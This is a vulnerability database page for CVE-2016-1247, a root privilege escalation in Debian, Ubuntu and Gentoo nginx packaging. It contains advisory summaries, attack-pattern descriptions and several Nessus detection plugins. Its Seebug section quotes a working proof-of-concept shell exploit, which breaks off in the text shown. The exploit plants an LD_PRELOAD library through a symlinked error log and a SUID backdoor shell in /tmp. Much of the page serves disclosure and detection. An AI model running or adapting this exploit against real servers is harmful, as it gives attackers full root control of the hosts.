Vulnerabilities > CVE-2016-1247 - Link Following vulnerability in multiple products

047910
CVSS 7.8 - HIGH
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
LOW
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
local
low complexity
f5
fedoraproject
CWE-59
nessus
exploit available

Summary

The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.

Vulnerable Configurations

Part Description Count
Application
F5
463
OS
Canonical
3
OS
Debian
1
OS
Fedoraproject
3

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Symlink Attack
    An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

descriptionNginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation. CVE-2016-1247. Local exploit for Linux platform
fileexploits/linux/local/40768.sh
idEDB-ID:40768
last seen2016-11-16
modified2016-11-16
platformlinux
port
published2016-11-16
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/40768/
titleNginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
typelocal

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-3701.NASL
    descriptionDawid Golunski reported the nginx web server packages in Debian suffered from a privilege escalation vulnerability (www-data to root) due to the way log files are handled. This security update changes ownership of the /var/log/nginx directory root. In addition, /var/log/nginx has to be made accessible to local users, and local users may be able to read the log files themselves local until the next logrotate invocation.
    last seen2020-06-01
    modified2020-06-02
    plugin id94260
    published2016-10-26
    reporterThis script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94260
    titleDebian DSA-3701-1 : nginx - security update
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-3701. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(94260);
      script_version("1.6");
      script_cvs_date("Date: 2018/11/10 11:49:38");
    
      script_cve_id("CVE-2016-1247");
      script_xref(name:"DSA", value:"3701");
    
      script_name(english:"Debian DSA-3701-1 : nginx - security update");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski reported the nginx web server packages in Debian
    suffered from a privilege escalation vulnerability (www-data to root)
    due to the way log files are handled. This security update changes
    ownership of the /var/log/nginx directory root. In addition,
    /var/log/nginx has to be made accessible to local users, and local
    users may be able to read the log files themselves local until the
    next logrotate invocation."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/nginx"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2016/dsa-3701"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the nginx packages.
    
    For the stable distribution (jessie), this problem has been fixed in
    version 1.6.2-5+deb8u3."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nginx");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2016/10/25");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/26");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"nginx", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-common", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-doc", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-extras", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-extras-dbg", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-full", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-full-dbg", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-light", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-light-dbg", reference:"1.6.2-5+deb8u3")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3114-1.NASL
    descriptionDawid Golunski discovered that the nginx package incorrectly handled log file permissions. A remote attacker could possibly use this issue to obtain root privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id94289
    published2016-10-26
    reporterUbuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94289
    titleUbuntu 14.04 LTS / 16.04 LTS / 16.10 : nginx vulnerability (USN-3114-1)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-3114-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(94289);
      script_version("1.6");
      script_cvs_date("Date: 2019/09/18 12:31:46");
    
      script_cve_id("CVE-2016-1247");
      script_xref(name:"USN", value:"3114-1");
    
      script_name(english:"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : nginx vulnerability (USN-3114-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski discovered that the nginx package incorrectly handled
    log file permissions. A remote attacker could possibly use this issue
    to obtain root privileges.
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://usn.ubuntu.com/3114-1/"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-core");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-extras");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-full");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-light");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:14.04");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:16.04");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:16.10");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/11/29");
      script_set_attribute(attribute:"patch_publication_date", value:"2016/10/25");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/26");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Ubuntu Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    if (! preg(pattern:"^(14\.04|16\.04|16\.10)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 14.04 / 16.04 / 16.10", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    flag = 0;
    
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-common", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-core", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-extras", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-full", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-light", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-common", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-core", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-extras", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-full", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-light", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-common", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-core", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-extras", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-full", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-light", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : ubuntu_report_get()
      );
      exit(0);
    }
    else
    {
      tested = ubuntu_pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "nginx-common / nginx-core / nginx-extras / nginx-full / nginx-light");
    }
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201701-22.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201701-22 (NGINX: Privilege escalation) It was discovered that Gentoo&rsquo;s default NGINX installation applied similar problematic permissions on &ldquo;/var/log/nginx&rdquo; as Debian (DSA-3701) and is therefore vulnerable to the same attack described in CVE-2016-1247. Impact : A local attacker, who either is already NGINX&rsquo;s system user or belongs to NGINX&rsquo;s group, could potentially escalate privileges. Workaround : Ensure that no untrusted user can create files in directories which are used by NGINX (or an NGINX vhost) to store log files.
    last seen2020-06-01
    modified2020-06-02
    plugin id96416
    published2017-01-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96416
    titleGLSA-201701-22 : NGINX: Privilege escalation
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 201701-22.
    #
    # The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(96416);
      script_version("3.2");
      script_cvs_date("Date: 2019/04/10 16:10:17");
    
      script_cve_id("CVE-2016-1247");
      script_xref(name:"GLSA", value:"201701-22");
    
      script_name(english:"GLSA-201701-22 : NGINX: Privilege escalation");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-201701-22
    (NGINX: Privilege escalation)
    
        It was discovered that Gentoo&rsquo;s default NGINX installation applied
          similar problematic permissions on &ldquo;/var/log/nginx&rdquo; as Debian
          (DSA-3701) and is therefore vulnerable to the same attack described in
          CVE-2016-1247.
      
    Impact :
    
        A local attacker, who either is already NGINX&rsquo;s system user or belongs
          to NGINX&rsquo;s group, could potentially escalate privileges.
      
    Workaround :
    
        Ensure that no untrusted user can create files in directories which are
          used by NGINX (or an NGINX vhost) to store log files."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2016/dsa-3701"
      );
      # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?e1440e63"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/201701-22"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All NGINX users should upgrade to the latest ebuild revision:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=www-servers/nginx-1.10.2-r3'"
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:nginx");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/12");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"www-servers/nginx", unaffected:make_list("ge 1.10.2-r3"), vulnerable:make_list("lt 1.10.2-r3"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "NGINX");
    }
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/139750/nginx-escalate.txt
idPACKETSTORM:139750
last seen2017-01-14
published2016-11-16
reporterDawid Golunski
sourcehttps://packetstormsecurity.com/files/139750/Nginx-Root-Privilege-Escalation.html
titleNginx Root Privilege Escalation

Seebug

bulletinFamilyexploit
description- Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - Release date: 15.11.2016 - Revision 1.0 I. VULNERABILITY ------------------------- Nginx (Debian-based distros) - Root Privilege Escalation Fixed in 1.6.2-5+deb8u3 package on Debian, and 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS Update 11.01.2017: Gentoo and its nginx packages were also found affected by this vulnerability: https://security.gentoo.org/glsa/201701-22 II. BACKGROUND ------------------------- "nginx [engine x] is an HTTP and reverse proxy server, a mail proxy server, and a generic TCP/UDP proxy server, originally written by Igor Sysoev. For a long time, it has been running on many heavily loaded Russian sites including Yandex, Mail.Ru, VK, and Rambler. According to Netcraft, nginx served or proxied 27.80% busiest sites in October 2016. Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM." https://nginx.org/en/ III. INTRODUCTION ------------------------- Nginx web server packaging on Debian-based distributions such as Debian or Ubuntu was found to create log directories with insecure permissions which can be exploited by malicious local attackers to escalate their privileges from nginx/web user (www-data) to root. The vulnerability could be easily exploited by attackers who have managed to compromise a web application hosted on Nginx server and gained access to www-data account as it would allow them to escalate their privileges further to root access and fully compromise the system. IV. DESCRIPTION ------------------------- Nginx installed from default repositories on Debian-based systems (Debian, Ubuntu etc.) create nginx log directory at the following location and with the following permissions: ``` root@xenial:~# ls -ld /var/log/nginx/ drwxr-x--- 2 www-data adm 4096 Nov 12 22:32 /var/log/nginx/ root@xenial:~# ls -ld /var/log/nginx/* -rw-r----- 1 www-data adm 0 Nov 12 22:31 /var/log/nginx/access.log -rw-r--r-- 1 root root 0 Nov 12 22:47 /var/log/nginx/error.log ``` As the /var/log/nginx directory is owned by www-data, it is possible for local attackers who have gained access to the system through a vulnerability in a web application running on Nginx (or the server itself) to replace the log files with a symlink to an arbitrary file. Upon nginx startup/restart the logs would be written to the file pointed to by the symlink. This allows attackers to escalate privileges to root. Attackers who have managed to replace the log file with a symlink would have to wait for nginx daemon to re-open the log files. For this to happen nginx service needs to be restarted, or the daemon needs to receive a USR1 process signal. However, the USR1 is sent automatically on default installations of Debian-based systems through logrotate script which calls do_rotate() function as can be seen in the files quoted below: ``` --------[ /etc/logrotate.d/nginx ]-------- /var/log/nginx/*.log { daily missingok rotate 52 compress delaycompress notifempty create 0640 www-data adm sharedscripts prerotate if [ -d /etc/logrotate.d/httpd-prerotate ]; then \ run-parts /etc/logrotate.d/httpd-prerotate; \ fi \ endscript postrotate invoke-rc.d nginx rotate >/dev/null 2>&1 endscript } ------------------------------------------ ``` ``` ----------[ /etc/init.d/nginx ]----------- [...] do_rotate() { start-stop-daemon --stop --signal USR1 --quiet --pidfile $PID --name $NAME return 0 } [...] ----------------------------------------- ``` The logrotation script is called daily by cron.daily on default Ubuntu/Debian installations at 6:25am every day. If /etc/logrotate.d/nginx has been set to rotate logs 'daily' then attacker could gain root privileges within 24h upon the next log rotation without any system admin interaction. V. PROOF OF CONCEPT EXPLOIT ------------------------- ``` ------------[ nginxed-root.sh ]-------------- #!/bin/bash # # Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit # nginxed-root.sh (ver. 1.0) # # CVE-2016-1247 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # --- # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu # etc.) to escalate their privileges from nginx web server user (www-data) to root # through unsafe error log handling. # # The exploit waits for Nginx server to be restarted or receive a USR1 signal. # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx) # script which is called daily by the cron.daily on default installations. # The restart should take place at 6:25am which is when cron.daily executes. # Attackers can therefore get a root shell automatically in 24h at most without any admin # interaction just by letting the exploit run till 6:25am assuming that daily logrotation # has been configured. # # # Exploit usage: # ./nginxed-root.sh path_to_nginx_error.log # # To trigger logrotation for testing the exploit, you can run the following command: # # /usr/sbin/logrotate -vf /etc/logrotate.d/nginx # # See the full advisory for details at: # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # Video PoC: # https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/nginxrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Ctrl+C pressed" cleanexit 0 } #intro cat <<_eascii_ _______________________________ < Is your server (N)jinxed ? ;o > ------------------------------- \ \ __---__ _- /--______ __--( / \ )XXXXXXXXXXX\v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX\ /XXXXX( )--_ XXXXXXXXXXX\ /XXXXX/ ( O ) XXXXXX \XXXXX\ XXXXX/ / XXXXXX \__ \XXXXX XXXXXX__/ XXXXXX \__----> ---___ XXX__/ XXXXXX \__ / \- --__/ ___/\ XXXXXX / ___--/= \-\ ___/ XXXXXX '--- XXXXXX \-\/XXX\ XXXXXX /XXXXX \XXXXXXXXX \ /XXXXX/ \XXXXXX > _/XXXXX/ \XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- \XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV"" _eascii_ echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m" id | grep -q www-data if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi # [ Exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`" # Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered curl http://localhost/ >/dev/null 2>/dev/null # Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily # rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am) echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..." while :; do sleep 1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done # /etc/ld.so.preload should be owned by www-data user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" chmod 755 /etc/ld.so.preload # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo 2>/dev/null >/dev/null # 